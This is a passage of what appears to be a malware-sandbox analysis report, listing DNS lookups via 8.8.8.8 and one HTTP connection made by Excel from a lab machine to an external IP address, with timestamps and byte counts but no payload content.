Apr 12, 2021 17:12:47.083312035 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:48.181421041 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:48.235048056 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:01.141535044 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:01.203010082 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:05.354763031 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:05.403516054 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:34.520791054 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:34.570939064 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:13:38.405123949 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:13:38.466347933 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:26.532181025 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:26.596822023 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:27.531255960 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:27.553838968 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:27.607048035 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:27.627260923 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:28.253304005 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:28.315382957 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:28.810343981 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:28.889751911 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:29.552643061 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:29.604259968 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:30.134917021 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:30.192377090 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:30.652394056 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:30.709589005 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:31.627110004 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:31.685026884 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:14:32.329749107 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:14:32.388941050 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 12, 2021 17:12:10.166270971 CEST | 192.168.2.3 | 8.8.8.8 | 0xda23 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 12, 2021 17:12:28.505542040 CEST | 192.168.2.3 | 8.8.8.8 | 0xd09 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 12, 2021 17:12:10.235234022 CEST | 8.8.8.8 | 192.168.2.3 | 0xda23 | No error (0) | authgfx.msa.akadns6.net | CNAME (Canonical name) | IN (0x0001) | ||
Apr 12, 2021 17:12:28.651699066 CEST | 8.8.8.8 | 192.168.2.3 | 0xd09 | No error (0) | 64.207.186.30 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49714 | 64.207.186.30 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 12, 2021 17:12:28.785401106 CEST | 826 | OUT | |
Apr 12, 2021 17:12:29.014661074 CEST | 979 | IN |